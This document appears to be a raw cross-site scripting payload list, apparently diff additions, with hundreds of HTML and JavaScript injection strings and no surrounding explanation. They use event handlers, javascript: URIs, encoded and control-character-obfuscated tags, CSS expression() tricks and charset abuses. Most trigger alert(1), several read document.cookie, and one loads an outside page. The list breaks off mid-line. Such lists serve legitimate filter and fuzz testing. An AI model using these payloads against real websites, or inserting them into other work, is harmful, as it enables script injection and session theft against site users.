xlink:href=data:image/svg%2Bxml;base64,PHN2ZyBpZD0ieCIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxuczp4bGluaz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluayI%2BPGVtYmVkIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIiBzcmM9ImphdmFzY3JpcHQ6YWxlcnQoMSkiLz48L3N2Zz4=%23x> +</Script/"'--><Body /Autofocus /OnFocus = confirm`1` <!--> +PC9TY3JpcHQvIictLT48Qm9keSAvQXV0b2ZvY3VzIC9PbkZvY3VzID0gY29uZmlybWAxYCA8IS0tPg== +<html ontouchstart=alert(1)> +<html ontouchend=alert(1)> +<html ontouchmove=alert(1)> +<body onorientationchange=alert(1)> +<body onload=alert(1)> +<body onpageshow=alert(1)> +<body onfocus=alert(1)> +<body onhashchange=alert(1)><a href=%23x>click this!#x +<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x +<body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br> +<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br> +<br><x id=x>#x +<body onresize=alert(1)>press F12! +<body onhelp=alert(1)>press F1! +<marquee onstart=alert(1)> +<marquee loop=1 width=0 onfinish=alert(1)> +<audio src onloadstart=alert(1)> +<video onloadstart=alert(1)><source> +<input autofocus onblur=alert(1)> +<keygen autofocus onfocus=alert(1)> +<form onsubmit=alert(1)><input type=submit> +<select onchange=alert(1)><option>1<option>2 +<menu id=x contextmenu=x onshow=alert(1)>right click me! +<object onerror=alert(1)> +z" onmouseover="alert('Hackerone')" style="position:fixed;left:0;top:0;width:9999px;height:9999px;"> +%3Csvg%2Fx%3D%22%3E%22%2F%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E()%2F%2F +%3Csvg/x=%22%3E%22/%3Cscript%3Ealert(document.cookie)%3C/script%3E()// +';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +'-confirm`1`-' +'-document.write`<h1>juniorEXPLOIT</h1>`-' +%22><svg%20onload=confirm(1);> +'<'/'><'s't'y'l'e'/'o'n'l'o'a'd'='a'l'e'r't('1')'> +<script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> +<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +<img src=1 href=1 onerror="javascript:alert(1)"></img> +<audio src=1 href=1 onerror="javascript:alert(1)"></audio> +<video src=1 href=1 onerror="javascript:alert(1)"></video> +<body src=1 href=1 onerror="javascript:alert(1)"></body> +<image src=1 href=1 onerror="javascript:alert(1)"></image> +<object src=1 href=1 onerror="javascript:alert(1)"></object> +<script src=1 href=1 onerror="javascript:alert(1)"></script> +<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize> +<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange> +<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad> +<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter> +<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus> +<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll> +<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange> +<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp> +<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange> +<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad> +<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide> +<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver> +<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload> +<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad> +<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange> +<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave> +<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel> +<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad> +<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange> +<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow> +<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange> +<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus> +<applet onError applet onError="javascript:javascript:alert(1)"></applet onError> +<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart> +<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad> +<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver> +<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter> +<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload> +<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown> +<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll> +<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange> +<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur> +<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange> +<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload> +<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut> +<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove> +<body onResize body onResize="javascript:javascript:alert(1)"></body onResize> +<object onError object onError="javascript:javascript:alert(1)"></object onError> +<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState> +<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove> +<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange> +<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide> +<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload> +<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror> +<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup> +<body onunload body onunload="javascript:javascript:alert(1)"></body onunload> +<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload> +<body onload body onload="javascript:javascript:alert(1)"></body onload> +<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover> +<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload> +<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload> +<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus> +<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown> +<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload> +<iframe src iframe src="javascript:javascript:alert(1)"></iframe src> +<svg onload svg onload="javascript:javascript:alert(1)"></svg onload> +<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove> +<body onblur body onblur="javascript:javascript:alert(1)"></body onblur> +\x3Cscript>javascript:alert(1)</script> +'"`><script>/* *\x2Fjavascript:alert(1)// */</script> +<script>javascript:alert(1)</script\x0D +<script>javascript:alert(1)</script\x0A +<script>javascript:alert(1)</script\x0B +<script charset="\x22>javascript:alert(1)</script> +<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> --> +`"'><img src='#\x27 onerror=javascript:alert(1)> +<a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a> +"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p> +<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a> +<script>/* *\x2A/javascript:alert(1)// */</script> +<script>/* *\x00/javascript:alert(1)// */</script> +<details open ontoggle=window[490837..toString(1<<5)](atob('YWxlcnQoMSk='))> +<svg onload=window[490837..toString(1<<5)](atob('YWxlcnQoMSk='));> +<marquee/onstart=window[490837..toString(1<<5)](atob('YWxlcnQoMSk='))> +<svg onpointerenter=z=alert,z(document.domain)> +<object data=javascript:window[490837..toString(1<<5)](atob('YWxlcnQoMSk='))> +</TITLE><object/data=https://finickycold.htmlpasta.com> +"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>" +<svg onload=alert(1)> +<input type=text autofocus onfocus=window[490837..toString(1<<5)](atob('YWxlcnQoMSk='))// +"><svg onload=alert(1)> +</tag><svg onload=alert(1)> +<script qwerty>window[490837..toString(1<<5)](atob('YWxlcnQoMSk='))</script qwerty> +<image src\r\n=valid.jpg onloadend='new class extends (co\u006efir\u006d)/**/`` &lcub;&rcub;'> +<style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style> +"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF +"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF +<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script> +<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script> +<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> +"'`><\x00img src=xxx:x onerror=javascript:alert(1)> +<script src="data:text/plain\x2Cjavascript:alert(1)"></script> +<script src="data:\xD4\x8F,javascript:alert(1)"></script> +<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script> +<script src="data:\xCB\x8F,javascript:alert(1)"></script> +<script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> +<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF +ABC<div style="x:expression\x5C(javascript:alert(1)">DEF +ABC<div style="x:expression\x00(javascript:alert(1)">DEF +ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF +ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF +ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x09expression(javascript:alert(1)">DEF +ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF +ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF +ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF +ABC<div style="x:\x20expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF +ABC<div style="x:\x00expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF +ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF +<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> +`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> +`"'><img src=xxx:x \x22onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Donerror=javascript:alert(1)> +`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> +`"'><img src=xxx:x \x09onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Conerror=javascript:alert(1)> +`"'><img src=xxx:x \x00onerror=javascript:alert(1)> +`"'><img src=xxx:x \x27onerror=javascript:alert(1)> +`"'><img src=xxx:x \x20onerror=javascript:alert(1)> +"`'><script>\x3Bjavascript:alert(1)</script> +"`'><script>\x0Djavascript:alert(1)</script> +"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> +"`'><script>\xE2\x80\x81javascript:alert(1)</script> +"`'><script>\xE2\x80\x84javascript:alert(1)</script> +"`'><script>\xE3\x80\x80javascript:alert(1)</script> +"`'><script>\x09javascript:alert(1)</script> +"`'><script>\xE2\x80\x89javascript:alert(1)</script> +"`'><script>\xE2\x80\x85javascript:alert(1)</script> +"`'><script>\xE2\x80\x88javascript:alert(1)</script> +"`'><script>\x00javascript:alert(1)</script> +"`'><script>\xE2\x80\xA8javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> +"`'><script>\xE1\x9A\x80javascript:alert(1)</script> +"`'><script>\x0Cjavascript:alert(1)</script> +"`'><script>\x2Bjavascript:alert(1)</script> +"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> +"`'><script>-javascript:alert(1)</script> +"`'><script>\x0Ajavascript:alert(1)</script> +"`'><script>\xE2\x80\xAFjavascript:alert(1)</script> +"`'><script>\x7Ejavascript:alert(1)</script> +"`'><script>\xE2\x80\x87javascript:alert(1)</script> +"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> +"`'><script>\xE2\x80\xA9javascript:alert(1)</script> +"`'><script>\xC2\x85javascript:alert(1)</script> +"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x83javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> +"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x80javascript:alert(1)</script> +"`'><script>\x21javascript:alert(1)</script> +"`'><script>\xE2\x80\x82javascript:alert(1)</script> +"`'><script>\xE2\x80\x86javascript:alert(1)</script> +"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> +"`'><script>\x0Bjavascript:alert(1)</script> +"`'><script>\x20javascript:alert(1)</script> +"`'><script>\xC2\xA0javascript:alert(1)</script> +"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x /> +"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x /> +"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x /> +"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x /> +"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x /> +"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x /> +"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x /> +"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x /> +"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x /> +<script\x2F>javascript:alert(1)</script> +<script\x20>javascript:alert(1)</script> +<script\x0D>javascript:alert(1)</script> +<script\x0A>javascript:alert(1)</script> +<script\x0C>javascript:alert(1)</script> +<script\x00>javascript:alert(1)</script> +<script\x09>javascript:alert(1)</script> +`"'><img src=xxx:x onerror\x0B=javascript:alert(1)> +`"'><img src=xxx:x onerror\x00=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0C=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0D=javascript:alert(1)> +`"'><img src=xxx:x onerror\x20=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0A=javascript:alert(1)> +`"'><img src=xxx:x onerror\x09=javascript:alert(1)> +<script>javascript:alert(1)<\x00/script> +<img src=# onerror\x3D"javascript:alert(1)" > +<input onfocus=javascript:alert(1) autofocus> +<input onblur=javascript:alert(1) autofocus><input autofocus> +<video poster=javascript:javascript:alert(1)// +<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus> +<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X +<video><source onerror="javascript:javascript:alert(1)"> +<video onerror="javascript:javascript:alert(1)"><source> +<form><button formaction="javascript:javascript:alert(1)">X +<body oninput=javascript:alert(1)><input autofocus> +<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math> +<frameset onload=javascript:alert(1)> +<table background="javascript:javascript:alert(1)"> +<!--<img src="--><img src=x onerror=javascript:alert(1)//"> +<comment><img src="</comment><img src=x onerror=javascript:alert(1))//"> +<![><img src="]><img src=x onerror=javascript:alert(1)//"> +<style><img src="</style><img src=x onerror=javascript:alert(1)//"> +<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div> +<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body> +<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT> +<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT> +<object data="data:text/html;base64,%(base64)s"> +<embed src="data:text/html;base64,%(base64)s"> +<b <script>alert(1)</script>0 +<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> +<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'> +<embed src="javascript:alert(1)"> +<img src="javascript:alert(1)"> +<image src="javascript:alert(1)"> +<script src="javascript:alert(1)"> +<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x +<? foo="><script>javascript:alert(1)</script>"> +<! foo="><script>javascript:alert(1)</script>"> +</ foo="><script>javascript:alert(1)</script>"> +<? foo="><x foo='?><script>javascript:alert(1)</script>'>"> +<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>"> +<% foo><x foo="%><script>javascript:alert(1)</script>"> +<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script> +<img \x00src=x onerror="alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x11src=x onerror="javascript:alert(1)"> +<img \x12src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x10src=x onerror="javascript:alert(1)"> +<img\x13src=x onerror="javascript:alert(1)"> +<img\x32src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x11src=x onerror="javascript:alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x34src=x onerror="javascript:alert(1)"> +<img \x39src=x onerror="javascript:alert(1)"> +<img \x00src=x onerror="javascript:alert(1)"> +<img src\x09=x onerror="javascript:alert(1)"> +<img src\x10=x onerror="javascript:alert(1)"> +<img src\x13=x onerror="javascript:alert(1)"> +<img src\x32=x onerror="javascript:alert(1)"> +<img src\x12=x onerror="javascript:alert(1)"> +<img src\x11=x onerror="javascript:alert(1)"> +<img src\x00=x onerror="javascript:alert(1)"> +<img src\x47=x onerror="javascript:alert(1)"> +<img src=x\x09onerror="javascript:alert(1)"> +<img src=x\x10onerror="javascript:alert(1)"> +<img src=x\x11onerror="javascript:alert(1)"> +<img src=x\x12onerror="javascript:alert(1)"> +<img src=x\x13onerror="javascript:alert(1)"> +<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> +<img src=x onerror=\x09"javascript:alert(1)"> +<img src=x onerror=\x10"javascript:alert(1)"> +<img src=x onerror=\x11"javascript:alert(1)"> +<img src=x onerror=\x12"javascript:alert(1)"> +<img src=x onerror=\x32"javascript:alert(1)"> +<img src=x onerror=\x00"javascript:alert(1)"> +<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a> +<img src="x` `<script>javascript:alert(1)</script>"` `> +<img src onerror /" '"= alt=javascript:alert(1)//"> +<title onpropertychange=javascript:alert(1)></title><title title=> +<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> +<!--[if]><script>javascript:alert(1)</script --> +<!--[if<img src=x onerror=javascript:alert(1)//]> --> +<script src="/\%(jscript)s"></script> +<script src="\\%(jscript)s"></script> +<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> +<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X +<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style> +<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d +<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> +<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a> +<style>*[{}@import'%(css)s?]</style>X +<div style="font-family:'foo&#10;;color:red;';">XXX +<div style="font-family:foo}color=red;">XXX +<// style=x:expression\28javascript:alert(1)\29> +<style>*{x:expression(javascript:alert(1))}</style> +<div style=content:url(%(svg)s)></div> +<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X +<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script> +<div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X +<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X +<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style> +<x style="background:url('x&#1;;color:red;/*')">XXX</x> +<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script> +<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> +<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script> +<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script> +<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi +<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> +<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾ +X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` > +1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` 